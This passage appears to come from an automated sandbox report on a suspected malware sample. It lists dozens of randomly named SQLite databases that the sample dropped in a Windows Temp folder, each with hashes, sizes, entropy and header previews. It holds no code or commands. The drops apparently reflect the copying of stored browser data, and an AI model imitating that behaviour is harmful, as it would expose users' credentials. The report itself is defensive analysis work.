                                                                    File Type:SQLite 3.x database, last written using SQLite version 3042000, file counter 7, database pages 5, cookie 0x5, schema 4, UTF-8, version-valid-for 7
                                                                    Category:dropped
                                                                    Size (bytes):20480
                                                                    Entropy (8bit):0.6732424250451717
                                                                    Encrypted:false
                                                                    SSDEEP:24:TLO1nKbXYFpFNYcoqT1kwE6UwpQ9YHVXxZ6HfB:Tq1KLopF+SawLUO1Xj8B
                                                                    MD5:CFFF4E2B77FC5A18AB6323AF9BF95339
                                                                    SHA1:3AA2C2115A8EB4516049600E8832E9BFFE0C2412
                                                                    SHA-256:EC8B67EF7331A87086A6CC085B085A6B7FFFD325E1B3C90BD3B9B1B119F696AE
                                                                    SHA-512:0BFDC8D28D09558AA97F4235728AD656FE9F6F2C61DDA2D09B416F89AB60038537B7513B070B907E57032A68B9717F03575DB6778B68386254C8157559A3F1BC
                                                                    Malicious:false
                                                                    Preview:SQLite format 3......@ ..........................................................................j...$......g..........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                    C:\Users\user\AppData\Local\Temp\g2AS65HkBu

                                                                    Download File
                                                                    Process:C:\Users\user\Desktop\jW5TA1J9Z1.exe
                                                                    File Type:SQLite 3.x database, last written using SQLite version 3035005, page size 2048, file counter 2, database pages 56, cookie 0x24, schema 4, UTF-8, version-valid-for 2
                                                                    Category:dropped
                                                                    Size (bytes):114688
                                                                    Entropy (8bit):0.9746603542602881
                                                                    Encrypted:false
                                                                    SSDEEP:192:CwbUJ6IH9xhomnGCTjHbRjCLqtzKWJaW:CfJ6a9xpnQLqtzKWJn
                                                                    MD5:780853CDDEAEE8DE70F28A4B255A600B
                                                                    SHA1:AD7A5DA33F7AD12946153C497E990720B09005ED
                                                                    SHA-256:1055FF62DE3DEA7645C732583242ADF4164BDCFB9DD37D9B35BBB9510D59B0A3
                                                                    SHA-512:E422863112084BB8D11C682482E780CD63C2F20C8E3A93ED3B9EFD1B04D53EB5D3C8081851CA89B74D66F3D9AB48EB5F6C74550484F46E7C6E460A8250C9B1D8
                                                                    Malicious:false
                                                                    Preview:SQLite format 3......@ .......8...........$......................................................O}...........4........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                    C:\Users\user\AppData\Local\Temp\gCdDSA3jkG

                                                                    Download File
                                                                    Process:C:\Users\user\Desktop\jW5TA1J9Z1.exe
                                                                    File Type:SQLite 3.x database, last written using SQLite version 3042000, file counter 5, database pages 5, cookie 0x3, schema 4, UTF-8, version-valid-for 5
                                                                    Category:dropped
                                                                    Size (bytes):20480
                                                                    Entropy (8bit):0.848598812124929
                                                                    Encrypted:false
                                                                    SSDEEP:24:TLVF1kwNbXYFpFNYcw+6UwcQVXH5fBODYfOg1ZAJFF0DiUhQ5de5SjhXE1:ThFawNLopFgU10XJBODqzqFF0DYde5P
                                                                    MD5:9664DAA86F8917816B588C715D97BE07
                                                                    SHA1:FAD9771763CD861ED8F3A57004C4B371422B7761
                                                                    SHA-256:8FED359D88F0588829BA60D236269B2528742F7F66DF3ACF22B32B8F883FE785
                                                                    SHA-512:E551D5CC3D5709EE00F85BB92A25DDC96112A4357DFEA3D859559D47DB30FEBD2FD36BDFA2BEC6DCA63D3E233996E9FCD2237F92CEE5B32BA8D7F2E1913B2DA9
                                                                    Malicious:false
                                                                    Preview:SQLite format 3......@ ..........................................................................j..........g...$......................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                    C:\Users\user\AppData\Local\Temp\gkdsbbazFG

                                                                    Download File
                                                                    Process:C:\Users\user\Desktop\jW5TA1J9Z1.exe
                                                                    File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 1, database pages 20, cookie 0xb, schema 4, UTF-8, version-valid-for 1
                                                                    Category:dropped
                                                                    Size (bytes):40960
                                                                    Entropy (8bit):0.8553638852307782
                                                                    Encrypted:false
                                                                    SSDEEP:48:2x7BA+IIF7CVEq8Ma0D0HOlf/6ykwp1EUwMHZq10bvJKLkw8s8LKvUf9KVyJ7h/f:QNDCn8MouB6wz8iZqmvJKLPeymwil
                                                                    MD5:28222628A3465C5F0D4B28F70F97F482
                                                                    SHA1:1BAA3DEB7DFD7C9B4CA9FDB540F236C24917DD14
                                                                    SHA-256:93A6AF6939B17143531FA4474DFC564FA55359308B910E6F0DCA774D322C9BE4
                                                                    SHA-512:C8FB93F658C1A654186FA6AA2039E40791E6B0A1260B223272BB01279A7B574E238B28217DADF3E1850C7083ADFA2FE5DA0CCE6F9BCABD59E1FFD1061B3A88F7
                                                                    Malicious:false
                                                                    Preview:SQLite format 3......@ ..........................................................................j.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                    C:\Users\user\AppData\Local\Temp\gnxDdQEedY

                                                                    Download File
                                                                    Process:C:\Users\user\Desktop\jW5TA1J9Z1.exe
                                                                    File Type:SQLite 3.x database, last written using SQLite version 3042000, file counter 5, database pages 5, cookie 0x3, schema 4, UTF-8, version-valid-for 5
                                                                    Category:dropped
                                                                    Size (bytes):20480
                                                                    Entropy (8bit):0.848598812124929
                                                                    Encrypted:false
                                                                    SSDEEP:24:TLVF1kwNbXYFpFNYcw+6UwcQVXH5fBODYfOg1ZAJFF0DiUhQ5de5SjhXE1:ThFawNLopFgU10XJBODqzqFF0DYde5P
                                                                    MD5:9664DAA86F8917816B588C715D97BE07
                                                                    SHA1:FAD9771763CD861ED8F3A57004C4B371422B7761
                                                                    SHA-256:8FED359D88F0588829BA60D236269B2528742F7F66DF3ACF22B32B8F883FE785
                                                                    SHA-512:E551D5CC3D5709EE00F85BB92A25DDC96112A4357DFEA3D859559D47DB30FEBD2FD36BDFA2BEC6DCA63D3E233996E9FCD2237F92CEE5B32BA8D7F2E1913B2DA9
                                                                    Malicious:false
                                                                    Preview:SQLite format 3......@ ..........................................................................j..........g...$......................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                    C:\Users\user\AppData\Local\Temp\gvMWELZmr2

                                                                    Download File
                                                                    Process:C:\Users\user\Desktop\jW5TA1J9Z1.exe
                                                                    File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 1, database pages 20, cookie 0xb, schema 4, UTF-8, version-valid-for 1
                                                                    Category:dropped
                                                                    Size (bytes):40960
                                                                    Entropy (8bit):0.8553638852307782
                                                                    Encrypted:false
                                                                    SSDEEP:48:2x7BA+IIF7CVEq8Ma0D0HOlf/6ykwp1EUwMHZq10bvJKLkw8s8LKvUf9KVyJ7h/f:QNDCn8MouB6wz8iZqmvJKLPeymwil
                                                                    MD5:28222628A3465C5F0D4B28F70F97F482
                                                                    SHA1:1BAA3DEB7DFD7C9B4CA9FDB540F236C24917DD14
                                                                    SHA-256:93A6AF6939B17143531FA4474DFC564FA55359308B910E6F0DCA774D322C9BE4
                                                                    SHA-512:C8FB93F658C1A654186FA6AA2039E40791E6B0A1260B223272BB01279A7B574E238B28217DADF3E1850C7083ADFA2FE5DA0CCE6F9BCABD59E1FFD1061B3A88F7
                                                                    Malicious:false
                                                                    Preview:SQLite format 3......@ ..........................................................................j.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                    C:\Users\user\AppData\Local\Temp\gzpTVhVBb7

                                                                    Download File
                                                                    Process:C:\Users\user\Desktop\jW5TA1J9Z1.exe
                                                                    File Type:SQLite 3.x database, last written using SQLite version 3035005, page size 2048, file counter 1, database pages 24, cookie 0xe, schema 4, UTF-8, version-valid-for 1
                                                                    Category:dropped
                                                                    Size (bytes):49152
                                                                    Entropy (8bit):0.8180424350137764
                                                                    Encrypted:false
                                                                    SSDEEP:96:uRMKLyeymwxCn8MZyFlSynlbiXyKwt8hG:uRkxGOXnlbibhG
                                                                    MD5:349E6EB110E34A08924D92F6B334801D
                                                                    SHA1:BDFB289DAFF51890CC71697B6322AA4B35EC9169
                                                                    SHA-256:C9FD7BE4579E4AA942E8C2B44AB10115FA6C2FE6AFD0C584865413D9D53F3B2A
                                                                    SHA-512:2A635B815A5E117EA181EE79305EE1BAF591459427ACC5210D8C6C7E447BE3513EAD871C605EB3D32E4AB4111B2A335F26520D0EF8C1245A4AF44E1FAEC44574
                                                                    Malicious:false
                                                                    Preview:SQLite format 3......@ ..........................................................................O}....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                    C:\Users\user\AppData\Local\Temp\hFZzHUh6Io

                                                                    Download File
                                                                    Process:C:\Users\user\Desktop\jW5TA1J9Z1.exe
                                                                    File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 1, database pages 25, cookie 0xe, schema 4, UTF-8, version-valid-for 1
                                                                    Category:dropped
                                                                    Size (bytes):51200
                                                                    Entropy (8bit):0.8746135976761988
                                                                    Encrypted:false
                                                                    SSDEEP:96:O8mmwLCn8MouB6wzFlOqUvJKLReZff44EK:O8yLG7IwRWf4
                                                                    MD5:9E68EA772705B5EC0C83C2A97BB26324
                                                                    SHA1:243128040256A9112CEAC269D56AD6B21061FF80
                                                                    SHA-256:17006E475332B22DB7B337F1CBBA285B3D9D0222FD06809AA8658A8F0E9D96EF
                                                                    SHA-512:312484208DC1C35F87629520FD6749B9DDB7D224E802D0420211A7535D911EC1FA0115DC32D8D1C2151CF05D5E15BBECC4BCE58955CFFDE2D6D5216E5F8F3BDF
                                                                    Malicious:false
                                                                    Preview:SQLite format 3......@ ..........................................................................j.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                    C:\Users\user\AppData\Local\Temp\hOKDsBekNr

                                                                    Download File
                                                                    Process:C:\Users\user\Desktop\jW5TA1J9Z1.exe
                                                                    File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 3, database pages 52, cookie 0x21, schema 4, UTF-8, version-valid-for 3
                                                                    Category:dropped
                                                                    Size (bytes):106496
                                                                    Entropy (8bit):1.137181696973627
                                                                    Encrypted:false
                                                                    SSDEEP:192:ZWTblyVZTnGtgTgabTanQeZVuSVumZa6cR/k4:MnlyfnGtxnfVuSVumEHRM4
                                                                    MD5:2D903A087A0C793BDB82F6426B1E8EFB
                                                                    SHA1:E7872CC094C598B104DA25AC6C8BEB82DAB3F08F
                                                                    SHA-256:AD67ADF2D572EF49DC95FD1A879F3AD3E0F4103DD563E713C466A1F02D57ED9A
                                                                    SHA-512:90080A361F04158C4E1CCBB3DE653FFF742C29A49523B6143B0047930FC34DC0F1D043D3C1B2B759933E1685A4CB382FD9E41B7ACDD362A2217C3810AEF95E65
                                                                    Malicious:false
                                                                    Preview:SQLite format 3......@ .......4...........!......................................................j............1........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                    C:\Users\user\AppData\Local\Temp\hQYoHeXEk3

                                                                    Download File
                                                                    Process:C:\Users\user\Desktop\jW5TA1J9Z1.exe
                                                                    File Type:SQLite 3.x database, last written using SQLite version 3042000, file counter 3, database pages 5, cookie 0x3, schema 4, UTF-8, version-valid-for 3
                                                                    Category:dropped
                                                                    Size (bytes):20480
                                                                    Entropy (8bit):0.5712781801655107
                                                                    Encrypted:false
                                                                    SSDEEP:12:TLVNFVP89GkwtwhuFdbXGwvfhowcFOaOmzdOtssh+bgc4Jp+FxOUwa5q0S9zXhZn:TL1F1kwNbXYFpFNYcw+6UwcQVXH5fB
                                                                    MD5:05A60B4620923FD5D53B9204391452AF
                                                                    SHA1:DC12F90925033F25C70A720E01D5F8666D0B46E4
                                                                    SHA-256:6F1CA729609806AF88218D0A35C3B9E34252900341A0E15D71F7F9199E422E13
                                                                    SHA-512:068A954C0C7A68E603D72032A447E7652B1E9CED5522562FBCBD9EC0A5D2D943701100049FA0A750E71C4D3D84210B48D10855E7CC60919E04ED884983D3C3D6
                                                                    Malicious:false
                                                                    Preview:SQLite format 3......@ ..........................................................................j..........g...$......................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                    C:\Users\user\AppData\Local\Temp\hf3YdLfMZr

                                                                    Download File
                                                                    Process:C:\Users\user\Desktop\jW5TA1J9Z1.exe
                                                                    File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 3, database pages 52, cookie 0x21, schema 4, UTF-8, version-valid-for 3
                                                                    Category:dropped
                                                                    Size (bytes):106496
                                                                    Entropy (8bit):1.137181696973627
                                                                    Encrypted:false
                                                                    SSDEEP:192:ZWTblyVZTnGtgTgabTanQeZVuSVumZa6cR/k4:MnlyfnGtxnfVuSVumEHRM4
                                                                    MD5:2D903A087A0C793BDB82F6426B1E8EFB
                                                                    SHA1:E7872CC094C598B104DA25AC6C8BEB82DAB3F08F
                                                                    SHA-256:AD67ADF2D572EF49DC95FD1A879F3AD3E0F4103DD563E713C466A1F02D57ED9A
                                                                    SHA-512:90080A361F04158C4E1CCBB3DE653FFF742C29A49523B6143B0047930FC34DC0F1D043D3C1B2B759933E1685A4CB382FD9E41B7ACDD362A2217C3810AEF95E65
                                                                    Malicious:false
                                                                    Preview:SQLite format 3......@ .......4...........!......................................................j............1........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                    C:\Users\user\AppData\Local\Temp\hw3AA49CxG

                                                                    Download File
                                                                    Process:C:\Users\user\Desktop\jW5TA1J9Z1.exe
                                                                    File Type:SQLite 3.x database, last written using SQLite version 3042000, file counter 3, database pages 5, cookie 0x3, schema 4, UTF-8, version-valid-for 3
                                                                    Category:dropped
                                                                    Size (bytes):20480
                                                                    Entropy (8bit):0.5712781801655107
                                                                    Encrypted:false
                                                                    SSDEEP:12:TLVNFVP89GkwtwhuFdbXGwvfhowcFOaOmzdOtssh+bgc4Jp+FxOUwa5q0S9zXhZn:TL1F1kwNbXYFpFNYcw+6UwcQVXH5fB
                                                                    MD5:05A60B4620923FD5D53B9204391452AF
                                                                    SHA1:DC12F90925033F25C70A720E01D5F8666D0B46E4
                                                                    SHA-256:6F1CA729609806AF88218D0A35C3B9E34252900341A0E15D71F7F9199E422E13
                                                                    SHA-512:068A954C0C7A68E603D72032A447E7652B1E9CED5522562FBCBD9EC0A5D2D943701100049FA0A750E71C4D3D84210B48D10855E7CC60919E04ED884983D3C3D6
                                                                    Malicious:false
                                                                    Preview:SQLite format 3......@ ..........................................................................j..........g...$......................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                    C:\Users\user\AppData\Local\Temp\iDN4oDg6Wg

                                                                    Download File
                                                                    Process:C:\Users\user\Desktop\jW5TA1J9Z1.exe
                                                                    File Type:SQLite 3.x database, last written using SQLite version 3042000, file counter 5, database pages 5, cookie 0x3, schema 4, UTF-8, version-valid-for 5
                                                                    Category:dropped
                                                                    Size (bytes):20480
                                                                    Entropy (8bit):0.848598812124929
                                                                    Encrypted:false
                                                                    SSDEEP:24:TLVF1kwNbXYFpFNYcw+6UwcQVXH5fBODYfOg1ZAJFF0DiUhQ5de5SjhXE1:ThFawNLopFgU10XJBODqzqFF0DYde5P
                                                                    MD5:9664DAA86F8917816B588C715D97BE07
                                                                    SHA1:FAD9771763CD861ED8F3A57004C4B371422B7761
                                                                    SHA-256:8FED359D88F0588829BA60D236269B2528742F7F66DF3ACF22B32B8F883FE785
                                                                    SHA-512:E551D5CC3D5709EE00F85BB92A25DDC96112A4357DFEA3D859559D47DB30FEBD2FD36BDFA2BEC6DCA63D3E233996E9FCD2237F92CEE5B32BA8D7F2E1913B2DA9
                                                                    Malicious:false
                                                                    Preview:SQLite format 3......@ ..........................................................................j..........g...$......................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                    C:\Users\user\AppData\Local\Temp\iJQ1pd8Ze3

                                                                    Download File
                                                                    Process:C:\Users\user\Desktop\jW5TA1J9Z1.exe
                                                                    File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 3, database pages 52, cookie 0x21, schema 4, UTF-8, version-valid-for 3
                                                                    Category:dropped
                                                                    Size (bytes):106496
                                                                    Entropy (8bit):1.1358696453229276
                                                                    Encrypted:false
                                                                    SSDEEP:192:ZWTblyVZTnGtgTgabTanQeZVuSVumZa6c5/w4:MnlyfnGtxnfVuSVumEH544
                                                                    MD5:28591AA4E12D1C4FC761BE7C0A468622
                                                                    SHA1:BC4968A84C19377D05A8BB3F208FBFAC49F4820B
                                                                    SHA-256:51624D124EFA3EE31EF43CB3D9ECFE98254D629957063747F4CA7061543B14B9
                                                                    SHA-512:5DDC8C36538AB1415637B2FF6C35AED3A94639A0C2B0A36E256A1C4477AA5A356813D1368913BA3B6E8B770625CDCB94EE7BFC17FD7D324982CFE3BDEC2D32EB
                                                                    Malicious:false
                                                                    Preview:SQLite format 3......@ .......4...........!......................................................j............1........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                    C:\Users\user\AppData\Local\Temp\iPGClKY3J6

                                                                    Download File
                                                                    Process:C:\Users\user\Desktop\jW5TA1J9Z1.exe
                                                                    File Type:SQLite 3.x database, last written using SQLite version 3042000, file counter 7, database pages 5, cookie 0x5, schema 4, UTF-8, version-valid-for 7
                                                                    Category:dropped
                                                                    Size (bytes):20480
                                                                    Entropy (8bit):0.6732424250451717
                                                                    Encrypted:false
                                                                    SSDEEP:24:TLO1nKbXYFpFNYcoqT1kwE6UwpQ9YHVXxZ6HfB:Tq1KLopF+SawLUO1Xj8B
                                                                    MD5:CFFF4E2B77FC5A18AB6323AF9BF95339
                                                                    SHA1:3AA2C2115A8EB4516049600E8832E9BFFE0C2412
                                                                    SHA-256:EC8B67EF7331A87086A6CC085B085A6B7FFFD325E1B3C90BD3B9B1B119F696AE
                                                                    SHA-512:0BFDC8D28D09558AA97F4235728AD656FE9F6F2C61DDA2D09B416F89AB60038537B7513B070B907E57032A68B9717F03575DB6778B68386254C8157559A3F1BC
                                                                    Malicious:false
                                                                    Preview:SQLite format 3......@ ..........................................................................j...$......g..........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                    C:\Users\user\AppData\Local\Temp\icoaLFoxVi

                                                                    Download File
                                                                    Process:C:\Users\user\Desktop\jW5TA1J9Z1.exe
                                                                    File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 1, database pages 20, cookie 0xb, schema 4, UTF-8, version-valid-for 1
                                                                    Category:dropped
                                                                    Size (bytes):40960
                                                                    Entropy (8bit):0.8553638852307782
                                                                    Encrypted:false
                                                                    SSDEEP:48:2x7BA+IIF7CVEq8Ma0D0HOlf/6ykwp1EUwMHZq10bvJKLkw8s8LKvUf9KVyJ7h/f:QNDCn8MouB6wz8iZqmvJKLPeymwil
                                                                    MD5:28222628A3465C5F0D4B28F70F97F482
                                                                    SHA1:1BAA3DEB7DFD7C9B4CA9FDB540F236C24917DD14
                                                                    SHA-256:93A6AF6939B17143531FA4474DFC564FA55359308B910E6F0DCA774D322C9BE4
                                                                    SHA-512:C8FB93F658C1A654186FA6AA2039E40791E6B0A1260B223272BB01279A7B574E238B28217DADF3E1850C7083ADFA2FE5DA0CCE6F9BCABD59E1FFD1061B3A88F7
                                                                    Malicious:false
                                                                    Preview:SQLite format 3......@ ..........................................................................j.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                    C:\Users\user\AppData\Local\Temp\ijPs2lXeJz

                                                                    Download File
                                                                    Process:C:\Users\user\Desktop\jW5TA1J9Z1.exe
                                                                    File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 3, database pages 52, cookie 0x21, schema 4, UTF-8, version-valid-for 3
                                                                    Category:dropped
                                                                    Size (bytes):106496
                                                                    Entropy (8bit):1.137181696973627
                                                                    Encrypted:false
                                                                    SSDEEP:192:ZWTblyVZTnGtgTgabTanQeZVuSVumZa6cR/k4:MnlyfnGtxnfVuSVumEHRM4
                                                                    MD5:2D903A087A0C793BDB82F6426B1E8EFB
                                                                    SHA1:E7872CC094C598B104DA25AC6C8BEB82DAB3F08F
                                                                    SHA-256:AD67ADF2D572EF49DC95FD1A879F3AD3E0F4103DD563E713C466A1F02D57ED9A
                                                                    SHA-512:90080A361F04158C4E1CCBB3DE653FFF742C29A49523B6143B0047930FC34DC0F1D043D3C1B2B759933E1685A4CB382FD9E41B7ACDD362A2217C3810AEF95E65
                                                                    Malicious:false
                                                                    Preview:SQLite format 3......@ .......4...........!......................................................j............1........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                    C:\Users\user\AppData\Local\Temp\ijbiZYkf1f

                                                                    Download File
                                                                    Process:C:\Users\user\Desktop\jW5TA1J9Z1.exe
                                                                    File Type:SQLite 3.x database, last written using SQLite version 3039003, file counter 3, database pages 5, cookie 0x3, schema 4, UTF-8, version-valid-for 3
                                                                    Category:dropped
                                                                    Size (bytes):20480
                                                                    Entropy (8bit):0.5707520969659783
                                                                    Encrypted:false
                                                                    SSDEEP:12:TLVlFVP89GkwtwhuFdbXGwvfhowcFOaOmzdOtssh+bgc4Jp+FxOUwa5q0S9zXhZn:TLxF1kwNbXYFpFNYcw+6UwcQVXH5fB
                                                                    MD5:9F6D153D934BCC50E8BC57E7014B201A
                                                                    SHA1:50B3F813A1A8186DE3F6E9791EC41D95A8DC205D
                                                                    SHA-256:2A7FC7F64938AD07F7249EC0BED6F48BC5302EA84FE9E61E276436EA942BA230
                                                                    SHA-512:B8CA2DCB8D62A0B2ED8795C3F67E4698F3BCB208C26FBD8BA9FD4DA82269E6DE9C5759F27F28DC108677DDEBBAC96D60C4ED2E64C90D51DB5B0F70331185B33F
                                                                    Malicious:false
                                                                    Preview:SQLite format 3......@ .........................................................................._..........g...$......................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                    C:\Users\user\AppData\Local\Temp\ik4pCHWgJB

                                                                    Download File
                                                                    Process:C:\Users\user\Desktop\jW5TA1J9Z1.exe
                                                                    File Type:SQLite 3.x database, last written using SQLite version 3039003, file counter 3, database pages 5, cookie 0x3, schema 4, UTF-8, version-valid-for 3
                                                                    Category:dropped
                                                                    Size (bytes):20480
                                                                    Entropy (8bit):0.5707520969659783
                                                                    Encrypted:false
                                                                    SSDEEP:12:TLVlFVP89GkwtwhuFdbXGwvfhowcFOaOmzdOtssh+bgc4Jp+FxOUwa5q0S9zXhZn:TLxF1kwNbXYFpFNYcw+6UwcQVXH5fB
                                                                    MD5:9F6D153D934BCC50E8BC57E7014B201A
                                                                    SHA1:50B3F813A1A8186DE3F6E9791EC41D95A8DC205D
                                                                    SHA-256:2A7FC7F64938AD07F7249EC0BED6F48BC5302EA84FE9E61E276436EA942BA230
                                                                    SHA-512:B8CA2DCB8D62A0B2ED8795C3F67E4698F3BCB208C26FBD8BA9FD4DA82269E6DE9C5759F27F28DC108677DDEBBAC96D60C4ED2E64C90D51DB5B0F70331185B33F
                                                                    Malicious:false
                                                                    Preview:SQLite format 3......@ .........................................................................._..........g...$......................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                    C:\Users\user\AppData\Local\Temp\io8Y8r6h1q

                                                                    Download File
                                                                    Process:C:\Users\user\Desktop\jW5TA1J9Z1.exe
                                                                    File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 1, database pages 20, cookie 0xb, schema 4, UTF-8, version-valid-for 1
                                                                    Category:dropped
                                                                    Size (bytes):40960
                                                                    Entropy (8bit):0.8553638852307782
                                                                    Encrypted:false
                                                                    SSDEEP:48:2x7BA+IIF7CVEq8Ma0D0HOlf/6ykwp1EUwMHZq10bvJKLkw8s8LKvUf9KVyJ7h/f:QNDCn8MouB6wz8iZqmvJKLPeymwil
                                                                    MD5:28222628A3465C5F0D4B28F70F97F482
                                                                    SHA1:1BAA3DEB7DFD7C9B4CA9FDB540F236C24917DD14
                                                                    SHA-256:93A6AF6939B17143531FA4474DFC564FA55359308B910E6F0DCA774D322C9BE4
                                                                    SHA-512:C8FB93F658C1A654186FA6AA2039E40791E6B0A1260B223272BB01279A7B574E238B28217DADF3E1850C7083ADFA2FE5DA0CCE6F9BCABD59E1FFD1061B3A88F7
                                                                    Malicious:false
                                                                    Preview:SQLite format 3......@ ..........................................................................j.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                    C:\Users\user\AppData\Local\Temp\ivswQiLH1n

                                                                    Download File
                                                                    Process:C:\Users\user\Desktop\jW5TA1J9Z1.exe
                                                                    File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 1, database pages 20, cookie 0xb, schema 4, UTF-8, version-valid-for 1
                                                                    Category:dropped
                                                                    Size (bytes):40960
                                                                    Entropy (8bit):0.8553638852307782
                                                                    Encrypted:false
                                                                    SSDEEP:48:2x7BA+IIF7CVEq8Ma0D0HOlf/6ykwp1EUwMHZq10bvJKLkw8s8LKvUf9KVyJ7h/f:QNDCn8MouB6wz8iZqmvJKLPeymwil
                                                                    MD5:28222628A3465C5F0D4B28F70F97F482
                                                                    SHA1:1BAA3DEB7DFD7C9B4CA9FDB540F236C24917DD14
                                                                    SHA-256:93A6AF6939B17143531FA4474DFC564FA55359308B910E6F0DCA774D322C9BE4
                                                                    SHA-512:C8FB93F658C1A654186FA6AA2039E40791E6B0A1260B223272BB01279A7B574E238B28217DADF3E1850C7083ADFA2FE5DA0CCE6F9BCABD59E1FFD1061B3A88F7
                                                                    Malicious:false
                                                                    Preview:SQLite format 3......@ ..........................................................................j.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                    C:\Users\user\AppData\Local\Temp\j5dUwTvyA8

                                                                    Download File
                                                                    Process:C:\Users\user\Desktop\jW5TA1J9Z1.exe
                                                                    File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 3, database pages 52, cookie 0x21, schema 4, UTF-8, version-valid-for 3
                                                                    Category:dropped
                                                                    Size (bytes):106496
                                                                    Entropy (8bit):1.137181696973627
                                                                    Encrypted:false
                                                                    SSDEEP:192:ZWTblyVZTnGtgTgabTanQeZVuSVumZa6cR/k4:MnlyfnGtxnfVuSVumEHRM4
                                                                    MD5:2D903A087A0C793BDB82F6426B1E8EFB
                                                                    SHA1:E7872CC094C598B104DA25AC6C8BEB82DAB3F08F
                                                                    SHA-256:AD67ADF2D572EF49DC95FD1A879F3AD3E0F4103DD563E713C466A1F02D57ED9A
                                                                    SHA-512:90080A361F04158C4E1CCBB3DE653FFF742C29A49523B6143B0047930FC34DC0F1D043D3C1B2B759933E1685A4CB382FD9E41B7ACDD362A2217C3810AEF95E65
                                                                    Malicious:false
                                                                    Preview:SQLite format 3......@ .......4...........!......................................................j............1........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                    C:\Users\user\AppData\Local\Temp\j6pmAVCDqL

                                                                    Download File
                                                                    Process:C:\Users\user\Desktop\jW5TA1J9Z1.exe
                                                                    File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 1, database pages 25, cookie 0xe, schema 4, UTF-8, version-valid-for 1
                                                                    Category:dropped
                                                                    Size (bytes):51200
                                                                    Entropy (8bit):0.8746135976761988
                                                                    Encrypted:false
                                                                    SSDEEP:96:O8mmwLCn8MouB6wzFlOqUvJKLReZff44EK:O8yLG7IwRWf4
                                                                    MD5:9E68EA772705B5EC0C83C2A97BB26324
                                                                    SHA1:243128040256A9112CEAC269D56AD6B21061FF80
                                                                    SHA-256:17006E475332B22DB7B337F1CBBA285B3D9D0222FD06809AA8658A8F0E9D96EF
                                                                    SHA-512:312484208DC1C35F87629520FD6749B9DDB7D224E802D0420211A7535D911EC1FA0115DC32D8D1C2151CF05D5E15BBECC4BCE58955CFFDE2D6D5216E5F8F3BDF
                                                                    Malicious:false
                                                                    Preview:SQLite format 3......@ ..........................................................................j.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                    C:\Users\user\AppData\Local\Temp\jGCCT9QY3C

                                                                    Download File
                                                                    Process:C:\Users\user\Desktop\jW5TA1J9Z1.exe
                                                                    File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 3, database pages 52, cookie 0x21, schema 4, UTF-8, version-valid-for 3
                                                                    Category:dropped
                                                                    Size (bytes):106496
                                                                    Entropy (8bit):1.137181696973627
                                                                    Encrypted:false
                                                                    SSDEEP:192:ZWTblyVZTnGtgTgabTanQeZVuSVumZa6cR/k4:MnlyfnGtxnfVuSVumEHRM4
                                                                    MD5:2D903A087A0C793BDB82F6426B1E8EFB
                                                                    SHA1:E7872CC094C598B104DA25AC6C8BEB82DAB3F08F
                                                                    SHA-256:AD67ADF2D572EF49DC95FD1A879F3AD3E0F4103DD563E713C466A1F02D57ED9A
                                                                    SHA-512:90080A361F04158C4E1CCBB3DE653FFF742C29A49523B6143B0047930FC34DC0F1D043D3C1B2B759933E1685A4CB382FD9E41B7ACDD362A2217C3810AEF95E65
